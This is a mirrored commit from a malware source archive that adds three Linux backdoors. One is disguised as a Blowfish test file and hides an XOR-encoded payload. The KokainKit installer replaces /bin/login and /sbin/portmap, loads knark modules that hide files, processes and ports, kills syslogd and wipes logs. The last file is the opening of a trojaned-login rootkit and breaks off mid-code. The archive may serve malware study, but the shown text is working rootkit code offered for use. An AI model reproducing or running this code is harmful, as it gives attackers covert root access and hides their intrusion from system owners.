mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 04:15:26 +00:00
Add files via upload
This commit is contained in:
parent
59bbac0d72
commit
b3ade600b3
251
Linux/Backdoor.Linux.Bofishy.a
Normal file
251
Linux/Backdoor.Linux.Bofishy.a
Normal file
@ -0,0 +1,251 @@
|
||||
/*
|
||||
* Blowfish input vectors are handled incorrectly on HP-UX PL.2 systems.
|
||||
* Perform routine compatability checks.
|
||||
*/
|
||||
#include <stdio.h>
|
||||
|
||||
#define KEY_TEST_NUM 25
|
||||
static unsigned char key_test[KEY_TEST_NUM]={
|
||||
0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87,
|
||||
0x78,0x69,0x5a,0x4b,0x3c,0x2d,0x1e,0x0f,
|
||||
0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,
|
||||
0x88};
|
||||
|
||||
/* DES cbc input vectors */
|
||||
static unsigned char ecb_data[]={
|
||||
|
||||
0x0c,0x0e,0x00,0x4d,0x46,0x41,0x00,0x5c,0x47,0x25,0x4c,
|
||||
0x4e,0x5b,0x0f,0x11,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,
|
||||
0x5b,0x01,0x4c,0x0f,0x13,0x13,0x70,0x6e,0x6c,0x6a,0x60,
|
||||
0x69,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
|
||||
0x13,0x5c,0x5b,0x4b,0x46,0x40,0x01,0x47,0x11,0x0f,0x25,
|
||||
0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5c,
|
||||
0x56,0x5c,0x00,0x5b,0x56,0x5f,0x4a,0x5c,0x01,0x47,0x11,
|
||||
0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
|
||||
0x13,0x5c,0x56,0x5c,0x00,0x5c,0x40,0x4c,0x44,0x4a,0x5b,
|
||||
0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,
|
||||
0x4b,0x4a,0x0f,0x13,0x41,0x4a,0x5b,0x46,0x41,0x4a,0x5b,
|
||||
0x00,0x46,0x41,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,
|
||||
0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5a,0x41,0x46,0x5c,
|
||||
0x5b,0x4b,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,
|
||||
0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x4a,0x5d,0x5d,0x41,0x40,
|
||||
0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,
|
||||
0x4b,0x4a,0x0f,0x13,0x5c,0x46,0x48,0x41,0x4e,0x43,0x01,
|
||||
0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,
|
||||
0x4a,0x0f,0x13,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x01,0x47,
|
||||
0x11,0x0f,0x25,0x45,0x42,0x5f,0x70,0x4d,0x5a,0x49,0x0f,
|
||||
0x4a,0x41,0x59,0x14,0x46,0x41,0x5b,0x0f,0x5c,0x14,0x4c,
|
||||
0x47,0x4e,0x5d,0x0f,0x05,0x46,0x70,0x59,0x4e,0x43,0x12,
|
||||
0x0d,0x73,0x57,0x1d,0x49,0x73,0x57,0x19,0x1d,0x73,0x57,
|
||||
0x19,0x16,0x73,0x57,0x19,0x4a,0x73,0x57,0x1d,0x49,0x73,
|
||||
0x57,0x18,0x1c,0x73,0x57,0x19,0x17,0x0d,0x14,0x59,0x40,
|
||||
0x46,0x4b,0x0f,0x5c,0x46,0x48,0x07,0x46,0x41,0x5b,0x0f,
|
||||
0x5c,0x46,0x48,0x06,0x54,0x4c,0x43,0x40,0x5c,0x4a,0x07,
|
||||
0x5c,0x06,0x14,0x5c,0x43,0x4a,0x4a,0x5f,0x07,0x1c,0x19,
|
||||
0x1f,0x1f,0x06,0x14,0x43,0x40,0x41,0x48,0x45,0x42,0x5f,
|
||||
0x07,0x4a,0x41,0x59,0x03,0x1f,0x06,0x14,0x52,0x46,0x41,
|
||||
0x5b,0x0f,0x42,0x4e,0x46,0x41,0x07,0x06,0x54,0x46,0x41,
|
||||
0x5b,0x0f,0x57,0x14,0x4c,0x47,0x4e,0x5d,0x0f,0x4c,0x03,
|
||||
0x05,0x4e,0x74,0x1d,0x72,0x14,0x5c,0x5b,0x5d,0x5a,0x4c,
|
||||
0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,0x70,
|
||||
0x46,0x41,0x0f,0x5c,0x4e,0x14,0x5c,0x5b,0x5d,0x5a,0x4c,
|
||||
0x5b,0x0f,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41,
|
||||
0x0f,0x4e,0x4c,0x5b,0x14,0x5c,0x58,0x46,0x5b,0x4c,0x47,
|
||||
0x07,0x49,0x40,0x5d,0x44,0x07,0x06,0x06,0x54,0x4c,0x4e,
|
||||
0x5c,0x4a,0x0f,0x1f,0x15,0x4d,0x5d,0x4a,0x4e,0x44,0x14,
|
||||
0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,0x15,0x4a,0x57,0x46,
|
||||
0x5b,0x07,0x1f,0x06,0x14,0x52,0x4c,0x43,0x40,0x5c,0x4a,
|
||||
0x07,0x1f,0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1e,
|
||||
0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1d,0x06,0x14,
|
||||
0x42,0x4a,0x42,0x5c,0x4a,0x5b,0x07,0x09,0x4e,0x4c,0x5b,
|
||||
0x03,0x1f,0x03,0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x4e,
|
||||
0x4c,0x5b,0x06,0x06,0x14,0x4e,0x4c,0x5b,0x01,0x5c,0x4e,
|
||||
0x70,0x47,0x4e,0x41,0x4b,0x43,0x4a,0x5d,0x12,0x5c,0x46,
|
||||
0x48,0x14,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41,
|
||||
0x07,0x7c,0x66,0x68,0x6e,0x63,0x7d,0x62,0x03,0x09,0x4e,
|
||||
0x4c,0x5b,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,0x4b,0x40,
|
||||
0x54,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x07,0x4a,0x41,0x59,
|
||||
0x06,0x14,0x46,0x49,0x07,0x07,0x5c,0x12,0x5c,0x40,0x4c,
|
||||
0x44,0x4a,0x5b,0x07,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b,
|
||||
0x03,0x7c,0x60,0x6c,0x64,0x70,0x7c,0x7b,0x7d,0x6a,0x6e,
|
||||
0x62,0x03,0x1f,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,0x06,
|
||||
0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x42,0x4a,
|
||||
0x42,0x5c,0x4a,0x5b,0x07,0x09,0x5c,0x4e,0x03,0x1f,0x03,
|
||||
0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x5c,0x4e,0x06,0x06,
|
||||
0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x49,0x4e,0x42,
|
||||
0x46,0x43,0x56,0x12,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b,
|
||||
0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x5f,0x40,0x5d,
|
||||
0x5b,0x12,0x47,0x5b,0x40,0x41,0x5c,0x07,0x19,0x19,0x19,
|
||||
0x18,0x06,0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x4e,
|
||||
0x4b,0x4b,0x5d,0x01,0x5c,0x70,0x4e,0x4b,0x4b,0x5d,0x12,
|
||||
0x46,0x41,0x4a,0x5b,0x70,0x4e,0x4b,0x4b,0x5d,0x07,0x0d,
|
||||
0x1d,0x1f,0x1c,0x01,0x19,0x1d,0x01,0x1e,0x1a,0x17,0x01,
|
||||
0x1c,0x1d,0x0d,0x06,0x14,0x4e,0x43,0x4e,0x5d,0x42,0x07,
|
||||
0x1e,0x1f,0x06,0x14,0x46,0x49,0x07,0x4c,0x40,0x41,0x41,
|
||||
0x4a,0x4c,0x5b,0x07,0x5c,0x03,0x07,0x5c,0x5b,0x5d,0x5a,
|
||||
0x4c,0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,
|
||||
0x05,0x06,0x09,0x5c,0x4e,0x03,0x5c,0x46,0x55,0x4a,0x40,
|
||||
0x49,0x07,0x5c,0x4e,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,
|
||||
0x06,0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x46,
|
||||
0x49,0x07,0x07,0x57,0x12,0x5d,0x4a,0x4e,0x4b,0x07,0x5c,
|
||||
0x03,0x09,0x4c,0x03,0x1e,0x06,0x06,0x12,0x12,0x07,0x02,
|
||||
0x1e,0x06,0x06,0x54,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,
|
||||
0x14,0x52,0x4a,0x43,0x5c,0x4a,0x0f,0x46,0x49,0x07,0x57,
|
||||
0x12,0x12,0x1e,0x06,0x54,0x5c,0x58,0x46,0x5b,0x4c,0x47,
|
||||
0x07,0x4c,0x06,0x54,0x4c,0x4e,0x5c,0x4a,0x0f,0x08,0x6e,
|
||||
0x08,0x15,0x4a,0x57,0x46,0x5b,0x07,0x1f,0x06,0x14,0x4c,
|
||||
0x4e,0x5c,0x4a,0x0f,0x08,0x6b,0x08,0x15,0x4e,0x43,0x4e,
|
||||
0x5d,0x42,0x07,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,
|
||||
0x5c,0x03,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,
|
||||
0x03,0x1e,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,0x03,
|
||||
0x1d,0x06,0x14,0x4e,0x74,0x1f,0x72,0x12,0x46,0x70,0x59,
|
||||
0x4e,0x43,0x14,0x4e,0x74,0x1e,0x72,0x12,0x61,0x7a,0x63,
|
||||
0x63,0x14,0x4a,0x57,0x4a,0x4c,0x59,0x4a,0x07,0x4e,0x74,
|
||||
0x1f,0x72,0x03,0x4e,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,
|
||||
0x4d,0x5d,0x4a,0x4e,0x44,0x14,0x4c,0x4e,0x5c,0x4a,0x0f,
|
||||
0x08,0x62,0x08,0x15,0x4e,0x43,0x4e,0x5d,0x42,0x07,0x1f,
|
||||
0x06,0x14,0x5c,0x46,0x48,0x07,0x1f,0x06,0x14,0x4d,0x5d,
|
||||
0x4a,0x4e,0x44,0x14,0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,
|
||||
0x15,0x52,0x52,0x4a,0x43,0x5c,0x4a,0x54,0x4a,0x57,0x46,
|
||||
0x5b,0x07,0x1f,0x06,0x14,0x52,0x52,0x58,0x47,0x46,0x43,
|
||||
0x4a,0x07,0x1e,0x06,0x14,0x52,0x25,0x70,0x6e,0x6c,0x6a,
|
||||
0x60,0x69,0x25,0x07,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,
|
||||
0x0f,0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,
|
||||
0x0f,0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,
|
||||
0x41,0x0f,0x11,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,
|
||||
0x0f,0x4c,0x5f,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,
|
||||
0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,0x41,0x0f,
|
||||
0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x42,0x01,0x40,
|
||||
0x5a,0x5b,0x25,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,0x0f,
|
||||
0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x0f,
|
||||
0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x0f,0x11,0x0f,
|
||||
0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,0x0f,0x4c,0x5f,0x0f,
|
||||
0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,0x4e,0x44,0x4a,0x49,
|
||||
0x46,0x43,0x4a,0x0f,0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,
|
||||
0x0f,0x42,0x01,0x40,0x5a,0x5b,0x25,0x5d,0x42,0x0f,0x02,
|
||||
0x49,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x05,0x25,
|
||||
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x12,0x0d,0x4f,
|
||||
0x4d,0x4e,0x5c,0x4a,0x41,0x4e,0x42,0x4a,0x0f,0x73,0x0d,
|
||||
0x73,0x4f,0x48,0x5d,0x4a,0x5f,0x0f,0x0b,0x7a,0x7c,0x6a,
|
||||
0x7d,0x15,0x0f,0x00,0x4a,0x5b,0x4c,0x00,0x5f,0x4e,0x5c,
|
||||
0x5c,0x58,0x4b,0x73,0x4f,0x73,0x0d,0x4f,0x0d,0x25,0x46,
|
||||
0x49,0x0f,0x0f,0x0e,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,
|
||||
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,
|
||||
0x5b,0x47,0x4a,0x41,0x0f,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,
|
||||
0x60,0x68,0x12,0x5c,0x47,0x14,0x0f,0x49,0x46,0x0f,0x25,
|
||||
0x48,0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,
|
||||
0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,
|
||||
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,
|
||||
0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,
|
||||
0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,
|
||||
0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,
|
||||
0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,
|
||||
0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,
|
||||
0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,
|
||||
0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,
|
||||
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,
|
||||
0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x48,0x4c,
|
||||
0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,
|
||||
0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,
|
||||
0x4a,0x5b,0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,
|
||||
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,
|
||||
0x0f,0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,
|
||||
0x7b,0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,
|
||||
0x68,0x0f,0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,
|
||||
0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,
|
||||
0x47,0x4a,0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,
|
||||
0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,
|
||||
0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,
|
||||
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,
|
||||
0x09,0x09,0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,
|
||||
0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,
|
||||
0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,0x7b,
|
||||
0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,0x7f,
|
||||
0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67,
|
||||
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25,
|
||||
0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,0x6a,
|
||||
0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,0x41,
|
||||
0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,
|
||||
0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,
|
||||
0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,
|
||||
0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,0x0f,
|
||||
0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x4c,0x4c,0x0f,
|
||||
0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,
|
||||
0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,0x4a,0x5b,
|
||||
0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,0x0f,0x0b,
|
||||
0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x0f,0x7f,
|
||||
0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67,
|
||||
0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25,
|
||||
0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,0x41,
|
||||
0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,0x41,
|
||||
0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,0x6a,
|
||||
0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x06,0x0f,0x1e,0x11,0x00,
|
||||
0x4b,0x4a,0x59,0x00,0x41,0x5a,0x43,0x43,0x0f,0x1d,0x11,
|
||||
0x09,0x1e,0x25,0x00};
|
||||
|
||||
/* big endian */
|
||||
static unsigned long bfplain[2][2]={
|
||||
{0x424c4f57L,0x46495348L},
|
||||
{0xfedcba98L,0x76543210L}
|
||||
};
|
||||
|
||||
static unsigned long bfcipher[2][2]={
|
||||
{0x324ed0feL,0xf413a203L},
|
||||
{0xcc91732bL,0x8022f684L}
|
||||
};
|
||||
|
||||
|
||||
static unsigned char ocb_data[]={
|
||||
0x4d,0x2c,0x20,0x73,0x69,0x67,0x29,0x3b,
|
||||
0x0a,0x20,0x64,0x6f,0x20,0x7b,0x0a,0x20,
|
||||
0x20,0x73,0x65,0x74,0x6a,0x6d,0x70,0x28,
|
||||
0x00};
|
||||
|
||||
static unsigned char cbc_key [16]={
|
||||
0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,
|
||||
0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87};
|
||||
|
||||
static unsigned char cbc_iv [8]={0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10};
|
||||
|
||||
#if defined(WIN16) || defined(__LP32__)
|
||||
#elif defined(_CRAY) || defined(__ILP64__)
|
||||
/*
|
||||
* _CRAY note. I could declare short, but I have no idea what impact
|
||||
* does it have on performance on none-T3E machines. I could declare
|
||||
* int, but at least on C90 sizeof(int) can be chosen at compile time.
|
||||
* So I've chosen long...
|
||||
* <appro@fy.chalmers.se>
|
||||
*/
|
||||
#else
|
||||
#endif
|
||||
|
||||
main(void)
|
||||
{
|
||||
int i, n, err;
|
||||
unsigned char cbc_in[40],cbc_out[40],iv[8];
|
||||
|
||||
dup2(1, 2);
|
||||
#ifdef CHARSET_EPCDIC
|
||||
epcdic2ascii(ecb_data, strlen(ecb_data));
|
||||
#endif
|
||||
|
||||
printf("# testing in raw ecb mode\n");
|
||||
|
||||
n=0;
|
||||
if (memcmp(&(bfcipher[n][0]),&(cbc_iv[0]),8) != 0)
|
||||
{
|
||||
err = 1;
|
||||
}
|
||||
|
||||
if (memcmp(&(bfplain[n][0]),&(cbc_iv[0]),8) != 0)
|
||||
{
|
||||
err = 1;
|
||||
}
|
||||
|
||||
if (err)
|
||||
{
|
||||
for (i = 0; i < sizeof(ecb_data)-1; i++)
|
||||
fprintf(stderr, "%c", ecb_data[i] ^ 47);
|
||||
}
|
||||
return(0);
|
||||
}
|
174
Linux/Backdoor.Linux.Kokain
Normal file
174
Linux/Backdoor.Linux.Kokain
Normal file
@ -0,0 +1,174 @@
|
||||
#!/bin/sh
|
||||
|
||||
# KokainKit v1.6 by deka
|
||||
# -
|
||||
# A rootkit based on knark and cobolt.
|
||||
# Do not Distribute!
|
||||
# -
|
||||
|
||||
TORNDIR=/usr/src/.puta
|
||||
THEPASS=$1
|
||||
DITTPORT=$2
|
||||
THEDIR=/usr/lib/$THEPASS
|
||||
|
||||
echo "---------------------------------------"
|
||||
echo "[1;32m KokainKit v1.6 by dekah&self[0m"
|
||||
echo "---------------------------------------"
|
||||
echo ""
|
||||
echo "Using magic word $THEPASS and dittrichport $DITTPORT."
|
||||
echo "Installing. Please stand by... (Pour yourself an ice cold coke and chill)"
|
||||
|
||||
if ! test "$(whoami)" = "root"; then
|
||||
echo " - UID0 check failed"
|
||||
echo ""
|
||||
sleep 3
|
||||
echo "FATAL: You're not root"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if test -d "$TORNDIR"; then
|
||||
echo " - T0rnKit found. Screwing it up"
|
||||
killall -9 in.inetd
|
||||
killall -9 t0rntd
|
||||
echo "$RANDOMdecryptThisT0rn :D" > /etc/ttyhash
|
||||
echo "" > /usr/sbin/in.inetd
|
||||
echo "ap" > $TORNDIR/.1file
|
||||
echo "255.255" > $TORNDIR/.1addr
|
||||
echo "255.255" > $TORNDIR/.1logz
|
||||
echo "ap" > $TORNDIR/.1proc
|
||||
fi
|
||||
|
||||
if ! test -d "/usr/include"; then
|
||||
echo " - /usr/include does not exist, making it (ugly)..."
|
||||
mkdir /usr/include
|
||||
fi
|
||||
|
||||
if ! test -d "/usr/include/pwdb"; then
|
||||
echo " - /usr/include/pwdb does not exist, making it (ugly)..."
|
||||
mkdir /usr/include/pwdb
|
||||
fi
|
||||
|
||||
mkdir $THEDIR
|
||||
if test -d "$THEDIR"; then
|
||||
echo " - Secret dir created"
|
||||
else
|
||||
echo " - MkDir failed"
|
||||
echo ""
|
||||
echo "FATAL: Unable to create the secret directory"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
cd src
|
||||
echo "#define MAGIC_WORD \"$THEPASS\"" > kokain.h
|
||||
echo "#define MAGIC_DIR \"$THEDIR\"" >> kokain.h
|
||||
|
||||
gcc -O2 cobolt.c -o cobolt
|
||||
if test -r "./cobolt"; then
|
||||
echo " - Cobolt compiled"
|
||||
else
|
||||
echo " - gcc failed"
|
||||
echo ""
|
||||
cd ..
|
||||
sleep 3
|
||||
echo "FATAL: Unable to compile Cobolt"
|
||||
exit 1
|
||||
fi
|
||||
touch -acmr /bin/login cobolt
|
||||
cp /bin/login $THEDIR/login1
|
||||
cp cobolt $THEDIR/login2
|
||||
echo " - Cobolt installed"
|
||||
|
||||
gcc -O2 autoexec.c -o autoexec
|
||||
if test -r "./autoexec"; then
|
||||
echo " - AutoExec compiled"
|
||||
else
|
||||
echo " - gcc failed"
|
||||
echo ""
|
||||
cd ..
|
||||
echo "FATAL: Unable to compile AutoExec"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
touch -acmr /sbin/portmap autoexec
|
||||
cp /sbin/portmap $THEDIR/portmap
|
||||
rm -f /sbin/portmap
|
||||
cp autoexec /sbin/portmap
|
||||
echo "#!/bin/sh" > $THEDIR/autoexec
|
||||
echo " - AutoExec installed"
|
||||
cd ..
|
||||
|
||||
killall -9 syslogd klogd
|
||||
./wipe u root >/dev/null 2>&1
|
||||
rm -f /var/log/messages /var/log/secure
|
||||
cp /var/log/messages.1 /var/log/messages >/dev/null 2>&1
|
||||
cp /var/log/secure.1 /var/log/secure >/dev/null 2>&1
|
||||
cp /var/log/messages.0 /var/log/messages >/dev/null 2>&1
|
||||
cp /var/log/secure.0 /var/log/secure >/dev/null 2>&1
|
||||
echo " - Logs cleaned"
|
||||
|
||||
#echo "" > /etc/hosts.allow
|
||||
#echo "" > /etc/hosts.deny
|
||||
#echo " - Hosts.deny/Hosts.allow cleaned"
|
||||
echo " - Patching dittrich..."
|
||||
./bpatch ./dittrich __PATCHPort__ $DITTPORT
|
||||
|
||||
cat <<E0F>> $THEDIR/.bashrc
|
||||
alias ls="ls --color -alF"
|
||||
alias dir="dir --color"
|
||||
export PS1="\u@\h:\w# "
|
||||
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:$THEDIR:$THEDIR/stuff
|
||||
cd
|
||||
E0F
|
||||
echo " - .bashrc created"
|
||||
|
||||
cp -R dittrich stuff $THEDIR
|
||||
echo " - Stuff installed"
|
||||
|
||||
mkdir $THEDIR/knrk
|
||||
cd knark
|
||||
make >/dev/null 2>&1
|
||||
echo " - Knark compiled"
|
||||
cd ..
|
||||
rm -rf knark/knrksrc knark/Makefile
|
||||
cp -R knark/* $THEDIR/knrk
|
||||
echo "/sbin/insmod -f $THEDIR/knrk/knrk.o" >> $THEDIR/autoexec
|
||||
echo "/sbin/insmod -f $THEDIR/knrk/knrkmodhide.o" >> $THEDIR/autoexec
|
||||
echo "$THEDIR/knrk/knrkhidef $THEDIR" >> $THEDIR/autoexec
|
||||
echo "$THEDIR/knrk/knrkered /bin/login $THEDIR/login2" >> $THEDIR/autoexec
|
||||
echo "$THEDIR/knrk/knrknethide \":`./tohex $DITTPORT`\"" >> $THEDIR/autoexec
|
||||
echo "$THEDIR/dittrich" >> $THEDIR/autoexec
|
||||
echo "killall -31 dittrich" >> $THEDIR/autoexec
|
||||
|
||||
/sbin/portmap >/dev/null 2>&1
|
||||
echo " - Knark installed"
|
||||
|
||||
if test -d "/var/named/ADMROCKS"; then
|
||||
rm -rf /var/named/ADMROCKS
|
||||
echo " - AdmRocks erased"
|
||||
fi
|
||||
|
||||
cat /etc/inetd.conf | grep -v "2222" > /tmp/blahah
|
||||
rm -f /etc/inetd.conf
|
||||
cp /tmp/blahah /etc/inetd.conf
|
||||
rm -f /tmp/blahah
|
||||
echo " - Inetd.conf fixed"
|
||||
|
||||
PATH=/sbin:$PATH
|
||||
syslogd
|
||||
klogd
|
||||
echo " - Syslogd/Klogd restarted"
|
||||
cd ..
|
||||
rm -rf *kokain*
|
||||
echo " - KokainKit removed"
|
||||
|
||||
echo ""
|
||||
#echo "[1;34m--x( th1z b0x n0w b3L0NgZ t0 j00! )x-- --x(.:tHE:kOkAiNkIt:.)x--[0m"
|
||||
if test -d "/proc/$THEPASS";
|
||||
then
|
||||
echo "Knark installed successfully."
|
||||
else
|
||||
echo " KNARK INSTALLATION FAILED - INSTALLING LOGIN BD"
|
||||
cp $THEDIR/login2 /bin/login
|
||||
fi
|
||||
echo "kitinst $THEPASS $DITTPORT"
|
||||
# - EoF - #
|
85
Linux/Backdoor.Linux.Rootin.a
Normal file
85
Linux/Backdoor.Linux.Rootin.a
Normal file
@ -0,0 +1,85 @@
|
||||
#!/bin/sh
|
||||
|
||||
# Fearless Rootkit T-Type v0.1
|
||||
# Coded by Merlion merld_one@yahoo.com
|
||||
# To run:
|
||||
# chmod 755 droprk.sh
|
||||
# ./droprk.sh
|
||||
# Telnet to login daemon (port 513) and enter password
|
||||
# Have fun!
|
||||
|
||||
arg="$1"
|
||||
if [ "$arg" = "" ]; then
|
||||
echo "Usage is: ./droprk -i (to install) -r (to uninstall)"
|
||||
exit 1
|
||||
elif [ "$arg" = "-r" ]; then
|
||||
test -e /bin/.login && rm -f /bin/login; mv /bin/.login /bin/login; exit 0 || echo "Not installed"
|
||||
elif [ $arg = "-i" ]; then
|
||||
|
||||
cat > /tmp/drop.c << EOF
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <signal.h>
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h> /* For daemon related functions */
|
||||
|
||||
#define REAL "/bin/.login"
|
||||
#define TROJAN "/bin/login"
|
||||
#define ROOT "merlion"
|
||||
|
||||
char **execute;
|
||||
char passwd[8];
|
||||
|
||||
main(int argc, char **argv) {
|
||||
